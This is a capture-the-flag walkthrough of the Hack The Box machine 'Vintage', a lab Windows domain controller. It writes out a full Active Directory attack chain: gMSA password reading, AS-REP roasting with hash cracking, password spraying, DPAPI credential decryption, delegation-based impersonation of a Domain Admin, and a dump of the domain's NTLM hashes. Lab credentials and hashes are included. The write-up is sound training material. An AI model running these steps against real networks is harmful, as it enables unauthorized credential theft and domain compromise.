HTB-Vintage

Box Info

Difficulty	Hard
OS	Windows
IP Address	10.10.11.45
Credentials	P.Rosa : Rosaisbest123

Port Scanning

# Check all open TCP
sudo rustscan 10.10.11.45 -r 1-65535 --ulimit 5000
# Nmap scan with script on open TCP port
sudo nmap 10.10.11.45 -sCV -Pn -sT -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49668,49674,49685,53972,62290 
# Nmap scan vulnerability 
sudo nmap -sT -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49668,49674,49685,53972,62290 --script=vuln -O -Pn 10.10.11.45
# Nmap scan with UDP port
sudo nmap -sU --top-ports 20 -Pn 10.10.11.45

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-03-29 15:16:56Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49685/tcp open  msrpc         Microsoft Windows RPC
53972/tcp open  msrpc         Microsoft Windows RPC
62290/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Update DNS

sudo nano /etc/hosts
10.10.11.45 vintage.htb dc01.vintage.htb

Service Enumeration

389/tcp - LDAP

Since the account was provided lets use it to check LDAP

ldapsearch -x -H ldap://10.10.11.45 -D 'vintage\P.Rosa' -w 'Rosaisbest123' -b "DC=vintage,DC=htb" "(objectClass=user)" sAMAccountName memberOf

Outcome of the ldapsearch

# extended LDIF
#
# LDAPv3
# base <DC=vintage,DC=htb> with scope subtree
# filter: (objectClass=user)
# requesting: sAMAccountName memberOf 
#

# Administrator, Users, vintage.htb
dn: CN=Administrator,CN=Users,DC=vintage,DC=htb
memberOf: CN=Group Policy Creator Owners,CN=Users,DC=vintage,DC=htb
memberOf: CN=Domain Admins,CN=Users,DC=vintage,DC=htb
memberOf: CN=Enterprise Admins,CN=Users,DC=vintage,DC=htb
memberOf: CN=Schema Admins,CN=Users,DC=vintage,DC=htb
memberOf: CN=Administrators,CN=Builtin,DC=vintage,DC=htb
sAMAccountName: Administrator

# Guest, Users, vintage.htb
dn: CN=Guest,CN=Users,DC=vintage,DC=htb
memberOf: CN=Guests,CN=Builtin,DC=vintage,DC=htb
sAMAccountName: Guest

# DC01, Domain Controllers, vintage.htb
dn: CN=DC01,OU=Domain Controllers,DC=vintage,DC=htb
sAMAccountName: DC01$

# krbtgt, Users, vintage.htb
dn: CN=krbtgt,CN=Users,DC=vintage,DC=htb
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=vintage,DC=htb
sAMAccountName: krbtgt

# gMSA01, Managed Service Accounts, vintage.htb
dn: CN=gMSA01,CN=Managed Service Accounts,DC=vintage,DC=htb
sAMAccountName: gMSA01$

# fs01, Computers, vintage.htb
dn: CN=fs01,CN=Computers,DC=vintage,DC=htb
memberOf: CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=vintage,DC=htb
sAMAccountName: FS01$

# M.Rossi, Users, vintage.htb
dn: CN=M.Rossi,CN=Users,DC=vintage,DC=htb
sAMAccountName: M.Rossi

# R.Verdi, Users, vintage.htb
dn: CN=R.Verdi,CN=Users,DC=vintage,DC=htb
sAMAccountName: R.Verdi

# L.Bianchi, Users, vintage.htb
dn: CN=L.Bianchi,CN=Users,DC=vintage,DC=htb
memberOf: CN=ServiceManagers,OU=Pre-Migration,DC=vintage,DC=htb
memberOf: CN=Remote Management Users,CN=Builtin,DC=vintage,DC=htb
sAMAccountName: L.Bianchi

# G.Viola, Users, vintage.htb
dn: CN=G.Viola,CN=Users,DC=vintage,DC=htb
memberOf: CN=ServiceManagers,OU=Pre-Migration,DC=vintage,DC=htb
sAMAccountName: G.Viola

# C.Neri, Users, vintage.htb
dn: CN=C.Neri,CN=Users,DC=vintage,DC=htb
memberOf: CN=ServiceManagers,OU=Pre-Migration,DC=vintage,DC=htb
memberOf: CN=Remote Management Users,CN=Builtin,DC=vintage,DC=htb
sAMAccountName: C.Neri

# P.Rosa, Users, vintage.htb
dn: CN=P.Rosa,CN=Users,DC=vintage,DC=htb
sAMAccountName: P.Rosa

# svc_sql, Pre-Migration, vintage.htb
dn: CN=svc_sql,OU=Pre-Migration,DC=vintage,DC=htb
memberOf: CN=ServiceAccounts,OU=Pre-Migration,DC=vintage,DC=htb
sAMAccountName: svc_sql

# svc_ldap, Pre-Migration, vintage.htb
dn: CN=svc_ldap,OU=Pre-Migration,DC=vintage,DC=htb
memberOf: CN=ServiceAccounts,OU=Pre-Migration,DC=vintage,DC=htb
sAMAccountName: svc_ldap

# svc_ark, Pre-Migration, vintage.htb
dn: CN=svc_ark,OU=Pre-Migration,DC=vintage,DC=htb
memberOf: CN=ServiceAccounts,OU=Pre-Migration,DC=vintage,DC=htb
sAMAccountName: svc_ark

# C.Neri_adm, Users, vintage.htb
dn: CN=C.Neri_adm,CN=Users,DC=vintage,DC=htb
memberOf: CN=DelegatedAdmins,OU=Pre-Migration,DC=vintage,DC=htb
memberOf: CN=Remote Desktop Users,CN=Builtin,DC=vintage,DC=htb
sAMAccountName: C.Neri_adm

# L.Bianchi_adm, Users, vintage.htb
dn: CN=L.Bianchi_adm,CN=Users,DC=vintage,DC=htb
memberOf: CN=DelegatedAdmins,OU=Pre-Migration,DC=vintage,DC=htb
memberOf: CN=Domain Admins,CN=Users,DC=vintage,DC=htb
sAMAccountName: L.Bianchi_adm

# search reference
ref: ldap://ForestDnsZones.vintage.htb/DC=ForestDnsZones,DC=vintage,DC=htb

# search reference
ref: ldap://DomainDnsZones.vintage.htb/DC=DomainDnsZones,DC=vintage,DC=htb

# search reference
ref: ldap://vintage.htb/CN=Configuration,DC=vintage,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 21
# numEntries: 17
# numReferences: 3

Inside the LDAP info found a Computer in name of FS01.vintage.htb lets update it into /etc/hosts

Bloodhound

In order to get DNS work proper, we need to change our KALI resolver.

sudo nano /etc/resolv.conf
nameserver 10.10.11.45

Now we can start with bloodhound

sudo ntpdate 10.10.11.45 && bloodhound-python -u P.Rosa -p 'Rosaisbest123' -d vintage.htb -c All --zip -dc dc01.vintage.htb

After collected, start bloodhound

sudo neo4j start
bloodhound

L.BIANCHI_ADM user is Domain Admins

C.NERI_ADM user can RDP into DC01

GMSA01$@VINTAGE.HTB user had the GenericWrite and AddSelf permission to ServiceManagers group

FS01 Computer is member of Domain Computers and this group able to ReadGMSAPassword

Initiate User Foothold

Obtain gMSA01$

Use impacket-gettgt to obtain TGT ticket in ccache format

sudo ntpdate 10.10.11.45 && impacket-getTGT -dc-ip 10.10.11.45 vintage.htb/FS01$:fs01

export KRB5CCNAME=FS01\$.ccache

Then use BloodyAD to obtain GMSA01$ managed service account password which is storing in the msDS-ManagedPassword attributes

bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k get object 'GMSA01$' --attr msDS-ManagedPassword

distinguishedName: CN=gMSA01,CN=Managed Service Accounts,DC=vintage,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:b3a15bbdfb1c53238d4b50ea2c4d1178
msDS-ManagedPassword.B64ENCODED: cAPhluwn4ijHTUTo7liDUp19VWhIi9/YDwdTpCWVnKNzxHWm2Hl39sN8YUq3hoDfBcLp6S6QcJOnXZ426tWrk0ztluGpZlr3eWU9i6Uwgkaxkvb1ebvy6afUR+mRvtftwY1Vnr5IBKQyLT6ne3BEfEXR5P5iBy2z8brRd3lBHsDrKHNsM+Yd/OOlHS/e1gMiDkEKqZ4dyEakGx5TYviQxGH52ltp1KqT+Ls862fRRlEzwN03oCzkLYg24jvJW/2eK0aXceMgol7J4sFBY0/zAPwEJUg1PZsaqV43xWUrVl79xfcSbyeYKL0e8bKhdxNzdxPlsBcLbFmrdRdlKvE3WQ==

Now we can abuse the gMSA service user to obtain the Kerberos TGT with the hashes

sudo ntpdate 10.10.11.45 && impacket-getTGT vintage.htb/GMSA01$ -hashes aad3b435b51404eeaad3b435b51404ee:b3a15bbdfb1c53238d4b50ea2c4d1178

export KRB5CCNAME=GMSA01\$.ccache

Then add P.Rosa into the SERVICEMANAGERS group, and use GMSA ccache to generate P.Rosa ticket

sudo ntpdate 10.10.11.45 && bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k add groupMember "SERVICEMANAGERS" "P.Rosa"

sudo ntpdate 10.10.11.45 && impacket-getTGT vintage.htb/P.Rosa:Rosaisbest123 -dc-ip dc01.vintage.htb 

export KRB5CCNAME=P.Rosa.ccache

With the SERVICEMANAGERS group, P.Rosa user now can obtain all the users.

ldapsearch -x -H ldap://10.10.11.45 -D "P.Rosa@vintage.htb" -w "Rosaisbest123" -b "DC=vintage,DC=htb" "(objectClass=user)" sAMAccountName | grep "sAMAccountName:" | cut -d " " -f 2 > users.txt

Then use Impacket-GetNPUsers to list all the users that doesn’t require Kerberos Preauth (UF_DONT_REQUIRE_PREAUTH)

sudo ntpdate 10.10.11.45 && impacket-GetNPUsers -dc-ip 10.10.11.45 -request -usersfile users.txt vintage.htb/

Disable PREAUTH

After listed all the user that doesn’t require Kerberos Preauth, now we can abuse the bloodyAD tools to update DONT_REQ_PREAUTH attributes into the service user

sudo ntpdate 10.10.11.45 && bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k add uac SVC_ARK -f DONT_REQ_PREAUTH
       
sudo ntpdate 10.10.11.45 && bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k add uac SVC_LDAP -f DONT_REQ_PREAUTH  
 
sudo ntpdate 10.10.11.45 && bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k add uac SVC_SQL -f DONT_REQ_PREAUTH  

Remove ACCOUNTDISABLE flags from the service users

sudo ntpdate 10.10.11.45 && bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k remove uac SVC_ARK -f ACCOUNTDISABLE
 
sudo ntpdate 10.10.11.45 && bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k remove uac SVC_LDAP -f ACCOUNTDISABLE
 
sudo ntpdate 10.10.11.45 && bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k remove uac SVC_SQL -f ACCOUNTDISABLE

Now lets check those AD users again

sudo ntpdate 10.10.11.45 && impacket-GetNPUsers -dc-ip 10.10.11.45 -request -usersfile users.txt vintage.htb/

Obtained both 3 service user hashes

$krb5asrep$23$svc_sql@VINTAGE.HTB:30fe580fde4cc8d859e66a0b633862ba$2a15c602b497013f8e4d445a711eceaadb5998c5b249411d3166ccea91ad5c37a91f26eace6a9f4f12009fa2712e959c68d8900185b0e07d3bd2df432497540874a4cbc5f1c4076b24c1652f6f7e8a294c0841614c3555a98a3cce78471c49c56aa607c01452c1e15d6f4034d32e7b15e4beff9d0a96eecc60d4a3d42109ce669c8bdc67d389df73e3e307f9a568b1904d74c14d617507edf0b5890b7dd03c0df8a87f3f1224a36be363b07e89f153b43815bdc18f34632859237aaa018b3231db461e6f77db0981f8a20819dc26684f1b231c2549b90ee8b0adb58fc59c2a19da122066a0209a60645d
$krb5asrep$23$svc_ldap@VINTAGE.HTB:ce3e6d591ee069ee4f84269d506e6495$294cae39538b0050bec15f7418342e3e0294e016ec3e61b96fc7d49034223b0cb12b70fc363998d9e1f949882511cd351ea322b8455d34496e5dc10dd322a626d30fc78d7908cc03c8705db7374459b6026a818b37db6681aabdfac970b5ba3735626eafe6eb7b033eb37dc04aea85b92f51580c614375d0b41a883ab5eb0cbaa91d8b1594315bdf9c2e6574f7f4871cd3abddf78afaaf09ec37422540aa2011fc1beb85ebe1b9c9049c433238be4525870102edc77f1eec5eaf64a170b2713a12dafe514a76272ee80708ca4ebeb0f6b782f1e8466c41b8fae9ad15d848af42e748dad671fd1ba32c69
$krb5asrep$23$svc_ark@VINTAGE.HTB:b1de691c95efac71e594b2981fa65887$8f21ce52b9457b693199d63e23b85ef2a1141c3d5e226384cec3ad5508d97209c30288e445980da0fbe05f12f0cf694e711eb1f87586df59a2483a6360b19400e14bff1abf06ae5afb6b33bf31ca038e48cf180ed34ba4ed318be4affe7a68792d0715f5cf82c9bb16f35c5bd5808a6c7a20971a9142f05439c9f2bc29b2fc471e712e78c85a48c7694168e013e4370ee37049dbfe906c2b2c1f5b49d66692c380be604a56481ad3c16c7d88f63ae711269be7b80a42a05886b86b5cc103c8a0e9cf9dc2fb8b5244219823575dea2d23b699a4961c0073d6ef60e979a9826aa419c81c83fb1b633cae2c

Crack Kerberos ASREP hash

hashcat -m 18200 svc_sql.hash /usr/share/wordlists/rockyou.txt

Here we obtained svc_sql service user password

svc_sql : Zer0the0ne

Kerbrute Password Spray

https://github.com/ropnop/kerbrute

With the password obtain, lets try to check Kerbrute to password spray

sudo ntpdate 10.10.11.45 && ./kerbrute --dc vintage.htb -d vintage.htb -v passwordspray ../HTB/Season6/Vintage/users.txt Zer0the0ne

From the results shows that 2 logins was successful

svc_sql@vintage.htb : Zer0the0ne
C.Neri@vintage.htb : Zer0the0ne

WinRM C.NERI

Before proceed to WinRM, we need to obtain c.neri user ceritifcate

sudo ntpdate 10.10.11.45 && impacket-getTGT vintage.htb/c.neri:Zer0the0ne -dc-ip vintage.htb
export KRB5CCNAME=c.neri.ccache
klist

Update /etc/krb5.conf

https://gist.github.com/zhsh9/f1ba951ec1eb3de401707bbbec407b98

Found a script to configure krb5.conf easily

python3 configure_krb5.py vintage.htb dc01

[libdefaults]
    default_realm = VINTAGE.HTB
    dns_lookup_kdc =true
    dns_lookup_realm = false
    ticket_lifetime = 24h  
    forwardable = true

[realms]
    VINTAGE.HTB = {
        kdc = dc01.vintage.htb
        admin_server = dc01.vintage.htb
        default_domain = vintage.htb
    }

[domain_realm]
    .vintage.htb = VINTAGE.HTB
    vintage.htb = VINTAGE.HTB

Now we only can winrm access

sudo ntpdate -s 10.10.11.45 && evil-winrm -i dc01.vintage.htb -u C.Neri -r vintage.htb

User Flag

Privilege Escalation

OS Explore

Inside the OS there is antivirus running, which is hard to exploit, check the writeups, found we can start from DAPI.

DPAPI

DPAPI secrets | The Hacker Recipes

The DPAPI (Data Protection API) is an internal component in the Windows system. It allows various applications to store sensitive data (e.g. passwords).

We can abuse DPAPI to obtain data that are stored in the users directory and are secured by user-specific master keys derived from the users password.

cd C:\Users\C.Neri\AppData\Roaming\Microsoft\Credentials
dir -h
download C4BB96844A5C9DD45D5B6A9859252BA6

cd C:\Users\C.Neri\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115
dir -h
download 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b

Decrypt the DPAPI

Decrypt Masterkey

impacket-dpapi masterkey -file 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b -sid S-1-5-21-4024337825-2033394866-2055507597-1115 -password Zer0the0ne

Owned the decrypted key, and it can be used to decrypt the credentials

Decrypt Credentials

impacket-dpapi credential -file C4BB96844A5C9DD45D5B6A9859252BA6 -key 0xf8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a

Here we obtained the c.neri_adm credentials

c.neri_adm : Uncr4ck4bl3P4ssW0rd0312

Bloodhound from C.Neri_adm

sudo ntpdate 10.10.11.45 && bloodhound-python -u c.neri_adm -p 'Uncr4ck4bl3P4ssW0rd0312' -d vintage.htb -c All --zip -ns 10.10.11.45

Initiate Root Foothold

DELEGATEDADMINS Group

Add the svc_sql user into DELEGATEDADMINS group

sudo ntpdate 10.10.11.45 && bloodyAD --host dc01.vintage.htb --dc-ip 10.10.11.45 -d "VINTAGE.HTB" -u c.neri_adm -p 'Uncr4ck4bl3P4ssW0rd0312' -k add groupMember "DELEGATEDADMINS" "SVC_SQL"

sudo ntpdate 10.10.11.45 && bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k set object "SVC_SQL" servicePrincipalName  -v "cifs/fake" 

Troubleshoot

Remove ACCOUNTDISABLE attribute from svc_sql user

sudo ntpdate 10.10.11.45 && bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" -u 'C.Neri' -p Zer0the0ne -k --dc-ip 10.10.11.45 remove uac svc_sql -f ACCOUNTDISABLE

Then obtain svc_sql TGT

sudo ntpdate 10.10.11.45 && impacket-getTGT vintage.htb/svc_sql:Zer0the0ne -dc-ip dc01.vintage.htb

export KRB5CCNAME=svc_sql.ccache

Impersonate L.BIANCHI_ADM

Now we had added the svc_sql user to DELEGATED ADMINS, then we can obtain the L.BIANCHI_ADM user ticket

sudo ntpdate 10.10.11.45 && impacket-getST -spn 'cifs/dc01.vintage.htb' -impersonate L.BIANCHI_ADM -dc-ip 10.10.11.45 -k 'vintage.htb/svc_sql:Zer0the0ne'

Update svc_sql users to DELEGATED ADMINS groups and obtain L.BIANCHI_ADM user tgt in quick.

sudo ntpdate 10.10.11.45 && impacket-getST -spn 'cifs/dc01.vintage.htb' -impersonate L.BIANCHI_ADM -dc-ip 10.10.11.45 -k 'vintage.htb/svc_sql:Zer0the0ne'

Once obtained, export to KRB5CCNAME and use wmiexec to access

export KRB5CCNAME=L.BIANCHI_ADM@cifs_dc01.vintage.htb@VINTAGE.HTB.ccache 
sudo ntpdate 10.10.11.45 && impacket-wmiexec -k -no-pass VINTAGE.HTB/L.BIANCHI_ADM@dc01.vintage.htb

Root Flag

LSA Hash

Dumping Domain Controller Hashes Locally and Remotely | Red Team Notes

sudo ntpdate 10.10.11.45 && impacket-secretsdump -just-dc-ntlm -k -no-pass VINTAGE.HTB/L.BIANCHI_ADM@dc01.vintage.htb

Administrator:500:aad3b435b51404eeaad3b435b51404ee:468c7497513f8243b59980f2240a10de:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:be3d376d906753c7373b15ac460724d8:::
M.Rossi:1111:aad3b435b51404eeaad3b435b51404ee:8e5fc7685b7ae019a516c2515bbd310d:::
R.Verdi:1112:aad3b435b51404eeaad3b435b51404ee:42232fb11274c292ed84dcbcc200db57:::
L.Bianchi:1113:aad3b435b51404eeaad3b435b51404ee:de9f0e05b3eaa440b2842b8fe3449545:::
G.Viola:1114:aad3b435b51404eeaad3b435b51404ee:1d1c5d252941e889d2f3afdd7e0b53bf:::
C.Neri:1115:aad3b435b51404eeaad3b435b51404ee:cc5156663cd522d5fa1931f6684af639:::
P.Rosa:1116:aad3b435b51404eeaad3b435b51404ee:8c241d5fe65f801b408c96776b38fba2:::
svc_sql:1134:aad3b435b51404eeaad3b435b51404ee:cc5156663cd522d5fa1931f6684af639:::
svc_ldap:1135:aad3b435b51404eeaad3b435b51404ee:458fd9b330df2eff17c42198627169aa:::
svc_ark:1136:aad3b435b51404eeaad3b435b51404ee:1d1c5d252941e889d2f3afdd7e0b53bf:::
C.Neri_adm:1140:aad3b435b51404eeaad3b435b51404ee:91c4418311c6e34bd2e9a3bda5e96594:::
L.Bianchi_adm:1141:aad3b435b51404eeaad3b435b51404ee:6b751449807e0d73065b0423b64687f0:::
DC01$:1002:aad3b435b51404eeaad3b435b51404ee:2dc5282ca43835331648e7e0bd41f2d5:::
gMSA01$:1107:aad3b435b51404eeaad3b435b51404ee:b3a15bbdfb1c53238d4b50ea2c4d1178:::
FS01$:1108:aad3b435b51404eeaad3b435b51404ee:44a59c02ec44a90366ad1d0f8a781274:::